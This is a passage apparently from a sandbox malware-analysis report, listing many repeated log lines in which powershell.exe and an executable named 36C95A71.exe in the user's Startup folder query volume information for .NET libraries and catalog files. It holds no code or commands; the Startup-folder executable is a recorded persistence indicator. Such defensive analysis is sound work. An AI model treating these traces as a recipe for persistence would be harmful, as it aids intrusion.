                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
